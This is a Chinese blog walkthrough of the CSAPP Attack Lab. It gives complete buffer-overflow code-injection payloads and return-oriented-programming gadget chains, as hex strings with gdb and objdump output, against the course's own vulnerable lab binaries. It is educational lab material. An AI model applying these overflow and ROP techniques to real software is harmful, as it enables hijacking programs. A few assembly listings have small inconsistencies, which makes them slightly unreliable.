CSAPP:Attack lab

关注公号【逆向通信猿】更精彩!!!

原文地址:https://www.jianshu.com/p/db731ca57342

本文介绍的是CSAPP书籍中的第三个lab: Attack lab。通过这个lab我们能够更加清楚和深入的了解到缓冲区溢出的隐患,以及如何利用缓冲区溢出这个漏洞对现有程序进行控制流劫持,执行非法程序代码,和对程序进行攻击以及破坏。

现在让我来揭开这个lab的每一层面纱:

Prerequire

(1)阅读《深入理解计算机系统》的3.10.2~3.10.5
(2)仔细阅读Attack lab的writeup
(3)熟练掌握gdb的使用,请参考gdb cheat sheet
(4)熟练x86-64下汇编的使用,详细请参考x64 cheat sheet

当然除了上面所必须了解的知识之外,我还建议大家看看cmu公开课Introducation to Computer System中的Recitation 5: Attack lab and Stack。一开始拿到这个lab的时候,我是对于这个lab如何下手并不是很明确,看完这个Recitation才比较明白了如何做。

知识预热

C语言中对于数组的引用不进行任何边界检查,而且局部变量和状态信息(如保存的寄存器值和返回地址)都存放在栈中。当对越界的数组元素的写操作时,则会破坏存储在栈中的状态信息。一种常见的破坏就是缓冲区溢出。通常,在栈中分配某个字符数组保存一个字符串,但是字符串的长度超出了为数组分配的空间。

程序示例:

/** echo.c  参照书籍中的代码*/#include <stdio.h>
#include <stdlib.h>void explosion(){printf("!!!You touch the explosion");exit(0);
}/* Implementation of library function gets() */
char *custom_gets(char *s){int c;char *dest = s;while((c = getchar()) != '\n' && c != EOF)*dest++ = c;if(c == EOF && dest == s)/* No characters read */return NULL;*dest++ = '\0'; /* Terminate string */return s;
}/** Read input line and write it back */
void echo(){char buf[8];custom_gets(buf);puts(buf);
}int main(int argc, char* argv[]){echo();return 0;
}

gets的问题是它没有办法为确保整个字符串分配了足够的空间。在echo示例中,我们故意将缓冲区设的非常小–只有8字节。任何长度超过7个字符的字符串都会导致写越界。

检查GCC为echo 产生的汇编代码,看看栈是如何组织的:

使用如下命令可以从c源文件生成汇编代码

linux> gcc -fno-asynchronous-unwind-tables -fno-stack-protector -O1 -S echo.c
  • -fno-asynchronous-unwind-tables选项是用来不生成CFI指令
  • -fno-stack-protector选项阻止进行栈破坏检测,默认是允许使用栈保护者
  • -O1 不做任何优化处理
  • -S 生成汇编代码即结束
/** void echo() */
echo:subq    $24, %rspmovq    %rsp, %rdicall    custom_getsmovq    %rsp, %rdicall    putsaddq    $24, %rspret

从汇编代码中可以看出,该程序在栈上为字符数组分配了24个字节。所以用户定义的字符数组为8个字节,意味着即使用户输入超过8个字节也不一定会对栈的状态信息造成破坏。但是如果用户输入超过23个字节,则会将echo的返回地址给破坏,这就是缓冲区溢出漏洞。

在这里插入图片描述

准备工作

从csapp的student site中下载下来整个lab,并且解压整个文件,可利用如下命令:

wget http://csapp.cs.cmu.edu/3e/target1.tar
tar -xvf target1.tar

大致浏览一下整个lab的目录,一共6个文件:

  • cookie.txt 一个8为16进行数,作为攻击的特殊标志符
  • farm.c 在ROP攻击中作为gadgets的产生源
  • ctarget 代码注入攻击的目标文件
  • rtarget ROP攻击的目标文件
  • hex2row 将16进制数转化为攻击字符,因为有些字符在屏幕上面无法输入,所以输入该字符的16进制数,自动转化为该字符

代码注入攻击

level 1

对于第一阶段,我们并不需要进行代码注入,我们需要做的就是劫持程序流,将函数的正常返回地址给重写,将函数重定向到我们指定的特定函数。在这个阶段中,我们要重定向到touch1函数。

解题思路:

  • 找到程序在栈为输入字符串分配了多大的空间
  • 找到touch1函数的起始地址
  • 将栈上分配的空间填满,并且在下8个字节,也就原先正常的返回地址上填上touch1函数的地址

ctarget 的正常流程如下:

void test()
{int val;val = getbuf();printf("No exploit. Getbuf returned 0x%x\n", val);
}

正常的流程是调用getbuf,然后从屏幕中输入字符串,如果正常退出的话,则会执行第5行代码。

void touch1() {vlevel = 1;printf("Touch!: You called touch1()\n");validate(1);exit(0);
}

现在的流程是调用getbuf,从屏幕输入字符串,然后程序返回到touch1.

(1) 利用gdb 调试ctarget找到我们需要的信息

linux> gdb ctarget

(2) 反汇编getbuf函数,找到实际在栈上分配了多少字节

(gdb)> disas getbuf0x00000000004017a8 <+0>:     sub    $0x28,%rsp0x00000000004017ac <+4>:     mov    %rsp,%rdi0x00000000004017af <+7>:     callq  0x401a40 <Gets>0x00000000004017b4 <+12>:    mov    $0x1,%eax0x00000000004017b9 <+17>:    add    $0x28,%rsp0x00000000004017bd <+21>:    retq

从第一行sub $0x28, %rsp中显示,在栈上为buf提供了0x28也就是40个字节的空间

(3)反汇编touch1函数,找到touch1函数的起始地址

(gdb)> disas touch10x00000000004017c0 <+0>:     sub    $0x8,%rsp0x00000000004017c4 <+4>:     movl   $0x1,0x202d0e(%rip)0x00000000004017ce <+14>:    mov    $0x4030c5,%edi0x00000000004017d3 <+19>:    callq  0x400cc0 <puts@plt>0x00000000004017d8 <+24>:    mov    $0x1,%edi0x00000000004017dd <+29>:    callq  0x401c8d <validate>0x00000000004017e2 <+34>:    mov    $0x0,%edi0x00000000004017e7 <+39>:    callq  0x400e40 <exit@plt>

从第一行中看出,touch1的返回地址是0x00000000004017c0

以上,我们已经到了我们需要的所有关键信息,现在构建我们输入字符,首先填充栈,可以使用任意字符,这里我使用的是16进制的0x00填充,然后填充touch1地址,最后得到是如下结果:

00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00       <----- touch1的起始地址

注意的是字节序的问题,大部分电脑应该都是little-endian字节序,即低位在低地址,高位在高地址。
在这里插入图片描述
使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level1.txt | ./ctarget -q

在这里插入图片描述

level 2

第二阶段,我们需要做的就是在输入字符串中注入一小段代码。其实整体的流程还是getbuf中输入字符,然后拦截程序流,跳转到调用touch2函数。首先,我们先查看一遍touch2函数所做事情:

void touch2(unsigned val){vlevel = 2;if (val == cookie){printf("Touch2!: You called touch2(0x%.8x)\n", val);validate(2);} else {printf("Misfire: You called touch2(0x%.8x)\n", val);fail(2);}exit(0);
}

这段程序就是验证传进来的参数val是否和cookie中值相等。本文中我的cookie值为:0x59b997fa

解题思路:

  • 将正常的返回地址设置为你注入代码的地址,本次注入直接在栈顶注入,所以即返回地址设置为%rsp的地址
  • 将cookie值移入到%rdi,%rdi是函数调用的第一个参数
  • 获取touch2的起始地址
  • 想要调用touch2,而又不能直接使用call,jmp等指令,所以只能使用ret改变当前指令寄存器的指向地址。ret是从栈上弹出返回地址,所以在次之前必须先将touch2的地址压栈

综上所述,可以得到注入的代码为:

/** inject.s */  注入的代码
movq    $0x59b997fa, %rdi
pushq   0x4017ec
ret

我们需要将上述的汇编代码转化为计算机可以执行的指令序列,执行下列命令:

linux> gcc -c inject.s
linux> objdump -d inject.oDisassembly of section .text:0000000000000000 <.text>:0:   48 c7 c7 fa 97 69 59    mov    $0x596997fa,%rdi7:   68 ec 17 40 00          pushq  $0x4017ecc:   c3                      retq

可以得到这三条指令序列如下:

48 c7 c7 fa 97 69 59 68 ec 17 40 00 c3

接下来就是寻找%rsp的地址,利用gdb进行调试,获取我们需要的信息:

linux> gdb ctarget(gdb)> break getbuf
(gdb)> run -q
(gdb)> disas
=> 0x00000000004017a8 <+0>:     sub    $0x28,%rsp0x00000000004017ac <+4>:     mov    %rsp,%rdi0x00000000004017af <+7>:     callq  0x401a40 <Gets>0x00000000004017b4 <+12>:    mov    $0x1,%eax0x00000000004017b9 <+17>:    add    $0x28,%rsp0x00000000004017bd <+21>:    retq(gdb)> stepi
(gdb) p /x $rsp
$1 = 0x5561dc78

如上所示,我们获取到了%rsp的地址,结合上文所讲,可以构造出如下字符串,在栈的开始位置为注入代码的指令序列,然后填充满至40个字节,在接下来的8个字节,也就是原来的返回地址,填充成注入代码的起始地址,也就是%rsp的地址,可以得到如下字符串:

48 c7 c7 fa 97 b9 59 68 ec 17 
40 00 c3 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 
78 dc 61 55 00 00 00 00      <--- 注入代码的起始地址

在这里插入图片描述
使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level2.txt | ./ctarget -q

在这里插入图片描述

level 3

第三阶段,也是需要在输入的字符串中注入一段代码,但是不同于第二阶段的是,在这一阶段中我们需要传递字符串作为参数。

在这一段中我们需要劫持控制流,在正常返回的时候,跳转到touch3函数,其中touch3函数的代码如下:

void touch3(char *sval){vlevel = 3;if (hexmatch(cookie, sval)){printf("Touch3!: You called touch3(\"%s\")\n", sval);validate(3);} else {printf("Misfire: You called touch3(\"%s\")\n", sval);fail(3);}exit(0);
}

在touch3函数中调用了hexmatch函数,这个函数的功能是匹配cookie和传进来的字符是否匹配。在本文中cookie的值是0x59b997fa,所以我们传进去的参数应该是"59b997fa"。

int hexmatch(unsigned val, char *sval){char cbuf[110];char *s = cbuf + random() % 100;sprintf(s, "%.8x", val);return strncmp(sval, s, 9) == 0;
}

Some Advice

在C语言中字符串是以\0结尾,所以在字符串序列的结尾是一个字节0
man ascii 可以用来查看每个字符的16进制表示
当调用hexmatch和strncmp时,他们会把数据压入到栈中,有可能会覆盖getbuf栈帧的数据,所以传进去字符串的位置必须小心谨慎。
对于传进去字符串的位置,如果放在getbuf栈中,因为:

char *s = cbuf + random() % 100;

s的位置是随机的,所以之前留在getbuf中的数据,则有可能被hexmatch所重写,所以放在getbuf中并不安全。为了安全起见,我们把字符串放在getbuf的父栈帧中,也就是test栈帧中。

解题思路:

  • 将cookie字符串转化为16进制
  • 将字符串的地址传送到%rdi中
  • 和第二阶段一样,想要调用touch3函数,则先将touch3函数的地址压栈,然后调用ret指令。

综上所述,可以得到注入的代码为:

/** inject.s */  注入的代码
movq    $0x5561dca8, %rdi
pushq   0x4018fa
ret

我们需要将上述的汇编代码转化为计算机可以执行的指令序列,执行下列命令:

linux> gcc -c inject.s
linux> objdump -d inject.oDisassembly of section .text:0000000000000000 <.text>:0:   48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi7:   68 fa 18 40 00          pushq  $0x4018fac:   c3                      retq

可以得到这三条指令序列如下:

48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3

使用man ascii命令,可以得到cookie的16进制数表示:

35 39 62 39 39 37 66 61 00

在这里插入图片描述
根据上述,我们可以得到最后输入字符的序列如下:

48 c7 c7 a8 dc 61 55 68 fa 18 
40 00 c3 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 35 39
62 39 39 37 66 61 00

使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level3.txt | ./ctarget -q

在这里插入图片描述

ROP攻击

缓冲区溢出攻击的普遍发生给计算机系统造成了许多麻烦。现代的编译器和操作系统实现了许多机制,以避免遭受这样的攻击,限制入侵者通过缓冲区溢出攻击获得系统控制的方式。

(1)栈随机化

栈随机化的思想使得栈的位置在程序每次运行时都有变化。因此,即使许多机器都运行同样的代码,它们的栈地址都是不同的。上述3个阶段中,栈的地址是固定的,所以我们可以获取到栈的地址,并跳转到栈的指定位置。

(2)栈破坏检测

最近的GCC版本在产生的代码加入了一种栈保护者机制,来检测缓冲区越界。其思想是在栈帧中任何局部缓冲区和栈状态之间存储一个特殊的金丝雀值。在恢复寄存器状态和从函数返回之前,程序检查这个金丝雀值是否被该函数的某个操作或者该函数调用的某个操作改变了。如果是的,那么程序异常中止。

(3)限制可执行代码区域

最后一招是消除攻击者向系统中插入可执行代码的能力。一种方法是限制哪些内存区域能够存放可执行代码。

在ROP攻击中,因为栈上限制了不可插入可执行代码,所以不能像上述第二、第三阶段中插入代码。所以我们需要在已经存在的程序中找到特定的指令序列,并且这些指令是以ret结尾,这一段指令序列,我们称之为gadget。
在这里插入图片描述
每一段gadget包含一系列指令字节,而且以ret结尾,跳转到下一个gadget,就这样连续的执行一系列的指令代码,对程序造成攻击。

示例

void setval_210(unsigned *p)
{*p = 3347663060U;
}

对于上述代码,进行反汇编我们可以得到如下的执行序列,从中我们一个得到一个有趣指令序列:

0000000000400f15 <setval_210>:400f15: c7 07 d4 48 89 c7 movl $0xc78948d4,(%rdi)400f1b: c3 retq

其中,字节序列48 89 c7是对指令movq %rax, %rdi的编码,就这样我们可以利用已经存在的程序,从中提取出特定的指令,执行特定的功能,地址为0x400f18,其功能是将%rax的内容移到%rdi。

指令的编码如下所示:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

level 2

在这一阶段中,我们其实是重复代码注入攻击中第二阶段的任务,劫持程序流,返回到touch2函数。只不过这个我们要做的是ROP攻击,这一阶段我们无法再像上一阶段中将指令序列放入到栈中,所以我们需要到现有的程序中,找到我们需要的指令序列。

我们需要的代码序列如下:

popq %rax
movq %rax, %rdi

popq %rax的指令字节为:58,所以我们找到了如下函数:

00000000004019a7 <addval_219>:4019a7: 8d 87 51 73 58 90     lea    -0x6fa78caf(%rdi),%eax4019ad: c3 

从中我们可以得出popq %rax指令的地址为:0x4019ab

movq %rax, %rdi的指令字节为:48 89 c7,所以我们找到了如下函数:

00000000004019a0 <addval_273>:4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax4019a6: c3  

从中我们可以得出movq %rax, %rdi指令的地址为:0x4019a2
在这里插入图片描述
综合上面所述,我们可以得到如下所述的字符串:

00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00

使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level4.txt | ./ctarget -q

在这里插入图片描述

level 3

在这一阶段中,我们需要做的就是把字符串的起始地址,传送到%rdi,然后调用touch3函数。

因为每次栈的位置是随机的,所以无法直接用地址来索引字符串的起始地址,只能用栈顶地址 + 偏移量来索引字符串的起始地址。从farm中我们可以获取到这样一个gadget,lea (%rdi,%rsi,1),%rax,这样就可以把字符串的首地址传送到%rax。

解题思路:

(1)首先获取到%rsp的地址,并且传送到%rdi
(2)其二获取到字符串的偏移量值,并且传送到%rsi
(3)lea (%rdi,%rsi,1),%rax, 将字符串的首地址传送到%rax, 再传送到%rdi
(4)调用touch3函数

(1) 第一步,获取到%rsp的地址

0000000000401a03 <addval_190>:401a03: 8d 87 41 48 89 e0     lea    -0x1f76b7bf(%rdi),%eax401a09: c3  

movq %rsp, %rax的指令字节为:48 89 e0, 所以这一步的gadget地址为:0x401a06

(2) 第二步,将%rax的内容传送到%rdi

00000000004019a0 <addval_273>:4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax4019a6: c3

movq %rax, %rdi的指令字节为:48 89 c7,所以这一步的gadget地址为:0x4019a2

(3) 第三步,将偏移量的内容弹出到%rax

00000000004019ca <getval_280>:4019ca: b8 29 58 90 c3        mov    $0xc3905829,%eax4019cf: c3   

popq %rax的指令字节为:58, 其中90为nop指令, 所以这一步的gadget地址为:0x4019cc

(4) 第四步,将%eax的内容传送到%edx

00000000004019db <getval_481>:4019db: b8 5c 89 c2 90        mov    $0x90c2895c,%eax4019e0: c3    

movl %eax, %edx的指令字节为:89 c2, 所以这一步的gadget地址为:0x4019dd

(5) 第五步,将%edx的内容传送到%ecx

0000000000401a6e <setval_167>:401a6e: c7 07 89 d1 91 c3     movl   $0xc391d189,(%rdi)401a74: c3  

movl %edx, %ecx的指令字节为:89 d1,所以这一步的gadget地址为:0x401a70

(6) 第六步,将%ecx的内容传送到%esi

0000000000401a11 <addval_436>:401a11: 8d 87 89 ce 90 90     lea    -0x6f6f3177(%rdi),%eax401a17: c3                    retq 

movl %ecx, %esi的指令字节为:89 ce, 所以这一步gadget地址为:0x401a13

(7) 第七步,将栈顶 + 偏移量得到字符串的首地址传送到%rax

00000000004019d6 <add_xy>:4019d6: 48 8d 04 37           lea    (%rdi,%rsi,1),%rax4019da: c3                    retq 

这一步的gadget地址为:0x4019d6

(8) 将字符串首地址%rax传送到%rdi

00000000004019a0 <addval_273>:4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax4019a6: c3

movq %rax, %rdi的指令字节为:48 89 c7,所以这一步的gadget地址为:0x4019a2

整个栈的结构如下:
在这里插入图片描述
综上所述,我们可以得到字符串首地址和返回地址之前隔了9条指令,所以偏移量为72个字节,也就是0x48,可以的到如下字符串的输入:

00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 
a2 19 40 00 00 00 00 00 
cc 19 40 00 00 00 00 00 
48 00 00 00 00 00 00 00 
dd 19 40 00 00 00 00 00 
70 1a 40 00 00 00 00 00 
13 1a 40 00 00 00 00 00 
d6 19 40 00 00 00 00 00 
a2 19 40 00 00 00 00 00 
fa 18 40 00 00 00 00 00 
35 39 62 39 39 37 66 61 00

使用如下命令进行结果验证:

linux> ./hex2raw -i solutions/level5.txt | ./ctarget -q

在这里插入图片描述

总结

在做完整个lab下来,感觉真的受益良多,对于栈的理解有了更加深层的理解;对于缓冲区溢出也是更深入的了解,对于以后编写更加安全的代码,能够更加关注这一点。

能够站在更加底层的方面审视代码,才能够更深刻的理解代码的原理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/347001.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Spring休眠教程

1.简介 在本文中&#xff0c;我们将演示如何利用最流行的ORM&#xff08;对象关系映射&#xff09;工具之一的Hibernate的功能 &#xff0c;该工具可将面向对象的域模型转换为传统的关系数据库。 Hibernate是目前最流行的Java框架之一。 由于这个原因&#xff0c;我们在Java Co…

无状态会话的ejb_Java EE状态会话Bean(EJB)示例

无状态会话的ejb在本文中&#xff0c;我们将了解如何在简单的Web应用程序中使用状态会话Bean来跟踪客户端会话中的状态。 1.简介 有状态会话Bean通常保存有关特定客户端会话的信息&#xff0c;并在整个会话中保留该信息&#xff08;与无状态会话Bean相对&#xff09;。 有状态…

Maven教程之春

1.简介 在本文中&#xff0c;我们将演示如何针对非常特定的用例对Spring使用Maven依赖项。 我们使用的所有库的最新版本都可以在Maven Central上找到。 对于一个有效的构建周期而言&#xff0c;了解Maven依赖项的工作方式以及如何对其进行管理非常重要&#xff0c;并且对于在我…

java微妙_编码Java时的10个微妙的最佳实践

java微妙这是10条最佳实践的列表&#xff0c;这些最佳实践比您的平均Josh Bloch有效Java规则要微妙得多。 尽管Josh Bloch的列表很容易学习&#xff0c;并且涉及日常情况&#xff0c;但此处的列表包含了涉及API / SPI设计的较不常见的情况&#xff0c;尽管这些情况可能会产生很…

GraphQL在Wildfly群上

“ GraphQL是API的查询语言&#xff0c;是用于使用现有数据完成这些查询的运行时。 GraphQL为您的API中的数据提供了一个完整且易于理解的描述&#xff0c;使客户能够准确地询问他们所需的内容&#xff0c;仅此而已&#xff0c;使随着时间的推移更容易开发API并启用强大的开发人…

javafx 示例_示例介绍:JavaFX 8打印

javafx 示例我有一段时间没有写博客了&#xff0c;我想与其他人分享有关JavaFX的所有信息&#xff08;我的日常工作和家庭可能是借口&#xff09;。 对于那些对此博客不熟悉的人 &#xff0c;我是JavaFX 2 Introduction by Example&#xff08;JIBE&#xff09;的作者&#xff…

Spring Data JPA教程

在Java类或对象与关系数据库之间管理数据是一项非常繁琐且棘手的任务。 DAO层通常包含许多样板代码&#xff0c;应简化这些样板代码&#xff0c;以减少代码行数并使代码可重复使用。 在本教程中&#xff0c;我们将讨论Spring数据的JPA实现。 1.简介 1.1什么是JPA&#xff1f;…

使用storm 实时计算_使用Storm进行可扩展的实时状态更新

使用storm 实时计算在本文中&#xff0c;我将说明如何借助Storm框架以可扩展且无锁定的方式在数据库中维护实时事件驱动流程的当前状态。 Storm是基于事件的数据处理引擎。 它的模型依赖于基本原语&#xff0c;例如事件转换&#xff0c;过滤&#xff0c;聚合……&#xff0c;我…

【多元域乘法】多项式乘法电路原理及MATLAB详解

关注公号【逆向通信猿】更精彩!!! 关于二元域上的两个元素的乘法、多项式除法,在之前的博客 【有限域除法】二元多项式除法电路原理及MATLAB详解 子程序:sub_poly_div.m 【有限域元素加法和乘法】有限域元素加法和乘法的原理及MATLAB实现 子程序:sub_gf_add.m、sub_gf_…

my CSAPP Attack lab堆栈详解

关注公号【逆向通信猿】更精彩!!! 这个实验时学习了简书上的一篇文章后,自己根据课程例子进行的一次小测试,phase 4和5的堆栈图解还没有画,等后续有时间会进行补充。 本人转载的简书原文: https://blog.csdn.net/wlwdecs_dn/article/details/121249364#comments_19237…

Spring MVC教程

1.简介 作为企业Java开发人员&#xff0c;这项工作的主要重点之一是开发Web应用程序。 对于Web应用程序&#xff0c;后果还包括许多挑战。 具体来说&#xff0c;其中一些是状态管理&#xff0c;工作流和验证。 HTTP协议的无状态性质只会使事情变得更加复杂。 Spring的Web框架旨…

ubuntu22.04 下载路径

ftp下载路径 csdn下载 ubuntu22.04下载路径ubuntu-22.04-desktop-amd64.7z.001资源-CSDN文库 ubuntu22.04下载路径ubuntu-22.04-desktop-amd64.7z.002资源-CSDN文库 【免费】ubuntu-22.04-desktop-amd64.7z.003资源-CSDN文库 【免费】ubuntu-22.04-desktop-amd64.7z.004资源-…

Spring Reactor教程

在RESTful服务的世界中&#xff0c;实际上实际上是在幕后进行许多工作&#xff0c;我们通常必须在应用程序中进行很多处理&#xff0c;而实际上并不会影响需要发送给真实用户的响应。 可以被动地做出这些业务决策&#xff0c;以便它们对与应用程序交互的用户没有任何影响。 Spr…

api签名_使用签名保护基于HTTP的API

api签名我在EMC上的一个平台上可以构建SaaS解决方案。 与越来越多的其他应用程序一样&#xff0c;该平台具有基于RESTful HTTP的API。 使用JAX-RS之类的开发框架&#xff0c;构建这样的API相对容易。 但是&#xff0c; 正确构建它们并不容易。 建立基于HTTP的API的问题 问…

【多元域除法】多项式除法电路原理及MATLAB详解

关注公号【逆向通信猿】更精彩!!! 关于二元域上的两个元素的加法和乘法、多项式除法,在之前的博客 【有限域除法】二元多项式除法电路原理及MATLAB详解 子程序:sub_poly_div.m 【有限域元素加法和乘法】有限域元素加法和乘法的原理及MATLAB实现 子程序:sub_gf_add.m、s…

win10高分辨率下修改字体显示大小(不是缩放百分比)

问题 不通过修改设置缩放百分比来增大win10的字体显示大小&#xff0c;缩放百分比调大后会导致很多问题出现&#xff01;&#xff01;&#xff01; 修改 打开设置&#xff0c;或者右键个性化&#xff0c;在搜索栏输入&#xff1a;“放大文本大小”&#xff0c;搜索框下面会自…

应用程序无法正常启动 0xc0150002

Visual Studio 2017在debug下运行程序报错 应用程序无法正常启动 0xc0150002 分析原因 可能是&#xff1a;原程序是低版本的VS所编写的&#xff0c;缺少低版本的运行库&#xff0c;所以报错 解决 安装了VS2010后即可正常运行 error LNK2019: 无法解析的外部符号 __vsnwprin…

Excel之抽奖器实现

Excel实现一个抽奖器&#xff0c;关键在于学会几个Excel中的函数即可轻松实现。 单人抽奖 RANDBETWEEN 例&#xff1a; INDEX(A2:A61,RANDBETWEEN(1,60))缺点&#xff1a;这种方式生成的抽奖器&#xff0c;在多人情况下&#xff0c;由于RANDBETWEEN函数的返回值有可能是相同…

【RS码1】系统RS码编码原理及MATLAB实现(不使用MATLAB库函数)

关注公号【逆向通信猿】更精彩!!! 基础知识 要想搞懂本节知识,需要先熟悉掌握以下前几篇博客 【多元域乘法】多项式乘法电路原理及MATLAB详解 【多元域除法】多项式除法电路原理及MATLAB详解 RS码编码原理 RS码的编码与BCH码类似,区别在于RS码为多进制的 生成多项式…

如何用Java编写类似C的Sizeof函数

如果您刚开始学习Java并且是C语言背景&#xff0c;那么您可能已经注意到Java和C编程语言之间存在一些差异&#xff0c;例如String是Java中的对象&#xff0c;而不是NULL终止的字符数组。 同样&#xff0c;Java中没有sizeof&#xff08;&#xff09;运算符。 所有原始值都有预定…